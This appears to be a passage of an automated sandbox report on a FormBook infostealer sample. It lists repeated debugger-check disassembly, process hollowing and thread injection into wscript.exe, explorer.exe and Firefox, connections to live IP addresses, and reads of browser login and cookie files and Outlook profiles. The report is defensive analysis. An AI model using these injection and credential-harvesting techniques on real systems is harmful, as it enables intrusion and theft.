Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D mov eax, dword ptr fs:[00000030h] 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83BE60 mov eax, dword ptr fs:[00000030h] 6_2_1D83BE60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83BE60 mov eax, dword ptr fs:[00000030h] 6_2_1D83BE60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914E62 mov eax, dword ptr fs:[00000030h] 6_2_1D914E62
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D841E70 mov eax, dword ptr fs:[00000030h] 6_2_1D841E70
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D877E71 mov eax, dword ptr fs:[00000030h] 6_2_1D877E71
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FEE78 mov eax, dword ptr fs:[00000030h] 6_2_1D8FEE78
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87CE70 mov eax, dword ptr fs:[00000030h] 6_2_1D87CE70
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87C98F mov eax, dword ptr fs:[00000030h] 6_2_1D87C98F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87C98F mov eax, dword ptr fs:[00000030h] 6_2_1D87C98F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87C98F mov eax, dword ptr fs:[00000030h] 6_2_1D87C98F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 mov eax, dword ptr fs:[00000030h] 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CF9AA mov eax, dword ptr fs:[00000030h] 6_2_1D8CF9AA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CF9AA mov eax, dword ptr fs:[00000030h] 6_2_1D8CF9AA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C89A0 mov eax, dword ptr fs:[00000030h] 6_2_1D8C89A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83B9B0 mov eax, dword ptr fs:[00000030h] 6_2_1D83B9B0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8789B0 mov edx, dword ptr fs:[00000030h] 6_2_1D8789B0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D69B0 mov eax, dword ptr fs:[00000030h] 6_2_1D8D69B0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D69B0 mov eax, dword ptr fs:[00000030h] 6_2_1D8D69B0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D69B0 mov ecx, dword ptr fs:[00000030h] 6_2_1D8D69B0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84B9C0 mov eax, dword ptr fs:[00000030h] 6_2_1D84B9C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84B9C0 mov eax, dword ptr fs:[00000030h] 6_2_1D84B9C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8489C0 mov eax, dword ptr fs:[00000030h] 6_2_1D8489C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8489C0 mov eax, dword ptr fs:[00000030h] 6_2_1D8489C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86D9CE mov eax, dword ptr fs:[00000030h] 6_2_1D86D9CE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FD9C6 mov eax, dword ptr fs:[00000030h] 6_2_1D8FD9C6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CD9C7 mov eax, dword ptr fs:[00000030h] 6_2_1D8CD9C7
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E99D6 mov ecx, dword ptr fs:[00000030h] 6_2_1D8E99D6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D9129CF mov eax, dword ptr fs:[00000030h] 6_2_1D9129CF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D9129CF mov eax, dword ptr fs:[00000030h] 6_2_1D9129CF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8399F0 mov ecx, dword ptr fs:[00000030h] 6_2_1D8399F0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8409F0 mov eax, dword ptr fs:[00000030h] 6_2_1D8409F0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8749F0 mov eax, dword ptr fs:[00000030h] 6_2_1D8749F0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8749F0 mov eax, dword ptr fs:[00000030h] 6_2_1D8749F0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86B9FA mov eax, dword ptr fs:[00000030h] 6_2_1D86B9FA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D837917 mov eax, dword ptr fs:[00000030h] 6_2_1D837917
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D896912 mov eax, dword ptr fs:[00000030h] 6_2_1D896912
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872919 mov eax, dword ptr fs:[00000030h] 6_2_1D872919
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872919 mov eax, dword ptr fs:[00000030h] 6_2_1D872919
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D875921 mov eax, dword ptr fs:[00000030h] 6_2_1D875921
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D875921 mov ecx, dword ptr fs:[00000030h] 6_2_1D875921
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D875921 mov eax, dword ptr fs:[00000030h] 6_2_1D875921
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D875921 mov eax, dword ptr fs:[00000030h] 6_2_1D875921
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BC920 mov ecx, dword ptr fs:[00000030h] 6_2_1D8BC920
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BC920 mov eax, dword ptr fs:[00000030h] 6_2_1D8BC920
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BC920 mov eax, dword ptr fs:[00000030h] 6_2_1D8BC920
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BC920 mov eax, dword ptr fs:[00000030h] 6_2_1D8BC920
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83B931 mov eax, dword ptr fs:[00000030h] 6_2_1D83B931
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83B931 mov eax, dword ptr fs:[00000030h] 6_2_1D83B931
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D89693A mov eax, dword ptr fs:[00000030h] 6_2_1D89693A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D89693A mov eax, dword ptr fs:[00000030h] 6_2_1D89693A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D89693A mov eax, dword ptr fs:[00000030h] 6_2_1D89693A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D91492D mov eax, dword ptr fs:[00000030h] 6_2_1D91492D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5930 mov eax, dword ptr fs:[00000030h] 6_2_1D8D5930
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5930 mov eax, dword ptr fs:[00000030h] 6_2_1D8D5930
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5930 mov eax, dword ptr fs:[00000030h] 6_2_1D8D5930
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D5930 mov ecx, dword ptr fs:[00000030h] 6_2_1D8D5930
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D869938 mov ecx, dword ptr fs:[00000030h] 6_2_1D869938
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90892E mov eax, dword ptr fs:[00000030h] 6_2_1D90892E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90892E mov eax, dword ptr fs:[00000030h] 6_2_1D90892E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87C944 mov eax, dword ptr fs:[00000030h] 6_2_1D87C944
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86D940 mov eax, dword ptr fs:[00000030h] 6_2_1D86D940
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86D940 mov eax, dword ptr fs:[00000030h] 6_2_1D86D940
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86E94E mov eax, dword ptr fs:[00000030h] 6_2_1D86E94E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FD947 mov eax, dword ptr fs:[00000030h] 6_2_1D8FD947
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D864955 mov eax, dword ptr fs:[00000030h] 6_2_1D864955
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D864955 mov eax, dword ptr fs:[00000030h] 6_2_1D864955
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84B950 mov eax, dword ptr fs:[00000030h] 6_2_1D84B950
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84B950 mov ecx, dword ptr fs:[00000030h] 6_2_1D84B950
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84B950 mov eax, dword ptr fs:[00000030h] 6_2_1D84B950
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84B950 mov eax, dword ptr fs:[00000030h] 6_2_1D84B950
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84B950 mov eax, dword ptr fs:[00000030h] 6_2_1D84B950
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84B950 mov eax, dword ptr fs:[00000030h] 6_2_1D84B950
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90D946 mov eax, dword ptr fs:[00000030h] 6_2_1D90D946
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C395B mov eax, dword ptr fs:[00000030h] 6_2_1D8C395B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C395B mov eax, dword ptr fs:[00000030h] 6_2_1D8C395B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C395B mov eax, dword ptr fs:[00000030h] 6_2_1D8C395B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87C958 mov eax, dword ptr fs:[00000030h] 6_2_1D87C958
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85096B mov eax, dword ptr fs:[00000030h] 6_2_1D85096B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85096B mov eax, dword ptr fs:[00000030h] 6_2_1D85096B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846970 mov eax, dword ptr fs:[00000030h] 6_2_1D846970
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846970 mov eax, dword ptr fs:[00000030h] 6_2_1D846970
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846970 mov eax, dword ptr fs:[00000030h] 6_2_1D846970
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846970 mov eax, dword ptr fs:[00000030h] 6_2_1D846970
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846970 mov eax, dword ptr fs:[00000030h] 6_2_1D846970
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846970 mov eax, dword ptr fs:[00000030h] 6_2_1D846970
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846970 mov eax, dword ptr fs:[00000030h] 6_2_1D846970
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C488F mov eax, dword ptr fs:[00000030h] 6_2_1D8C488F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D867882 mov eax, dword ptr fs:[00000030h] 6_2_1D867882
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D866882 mov eax, dword ptr fs:[00000030h] 6_2_1D866882
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D866882 mov eax, dword ptr fs:[00000030h] 6_2_1D866882
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D866882 mov eax, dword ptr fs:[00000030h] 6_2_1D866882
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D88088E mov eax, dword ptr fs:[00000030h] 6_2_1D88088E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D88088E mov edx, dword ptr fs:[00000030h] 6_2_1D88088E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D88088E mov eax, dword ptr fs:[00000030h] 6_2_1D88088E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E1889 mov eax, dword ptr fs:[00000030h] 6_2_1D8E1889
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E1889 mov eax, dword ptr fs:[00000030h] 6_2_1D8E1889
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E1889 mov eax, dword ptr fs:[00000030h] 6_2_1D8E1889
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87188E mov eax, dword ptr fs:[00000030h] 6_2_1D87188E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87188E mov eax, dword ptr fs:[00000030h] 6_2_1D87188E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87B890 mov eax, dword ptr fs:[00000030h] 6_2_1D87B890
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87B890 mov eax, dword ptr fs:[00000030h] 6_2_1D87B890
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87B890 mov eax, dword ptr fs:[00000030h] 6_2_1D87B890
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CB890 mov eax, dword ptr fs:[00000030h] 6_2_1D8CB890
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CB890 mov eax, dword ptr fs:[00000030h] 6_2_1D8CB890
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CB890 mov ecx, dword ptr fs:[00000030h] 6_2_1D8CB890
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86D898 mov eax, dword ptr fs:[00000030h] 6_2_1D86D898
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F8890 mov eax, dword ptr fs:[00000030h] 6_2_1D8F8890
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F8890 mov eax, dword ptr fs:[00000030h] 6_2_1D8F8890
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83F8B0 mov eax, dword ptr fs:[00000030h] 6_2_1D83F8B0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83F8B0 mov eax, dword ptr fs:[00000030h] 6_2_1D83F8B0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83F8B0 mov eax, dword ptr fs:[00000030h] 6_2_1D83F8B0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83F8B0 mov eax, dword ptr fs:[00000030h] 6_2_1D83F8B0
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D4D36 LdrLoadDll,NtProtectVirtualMemory, 2_2_032D4D36

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 156.254.172.36 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.213.44.213 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.204.24.45 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.0.238.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 96.43.100.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.23.41 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 156.230.149.244 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.106.120.176 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.29.151.40 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 50.87.192.144 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.63.2.175 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 168.76.162.220 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.48.6 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: EC0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Section loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\wscript.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF71DCC0000 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\wscript.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF71DCC0000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Thread register set: target process: 7704 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 4684 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process created: C:\Users\user\Desktop\Lakeringernes (1).exe C:\Users\user\Desktop\Lakeringernes (1).exe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: RAVCpl64.exe, 00000008.00000000.2253550610.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000008.00000000.2246905847.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000008.00000002.6797714447.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: RAVCpl64.exe, 00000008.00000000.2253550610.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000008.00000000.2246905847.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000008.00000002.6797714447.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000008.00000000.2253550610.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000008.00000000.2246905847.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000008.00000002.6797714447.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.2714484492.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2599827646.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2483149352.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman;P&L
Source: RAVCpl64.exe, 00000008.00000000.2253550610.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000008.00000000.2246905847.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000008.00000002.6797714447.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 2_2_00405D1B

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\wscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2316669409.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2252030385.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2297348771.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6797344913.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.2257617609.0000000000511000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6788894111.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
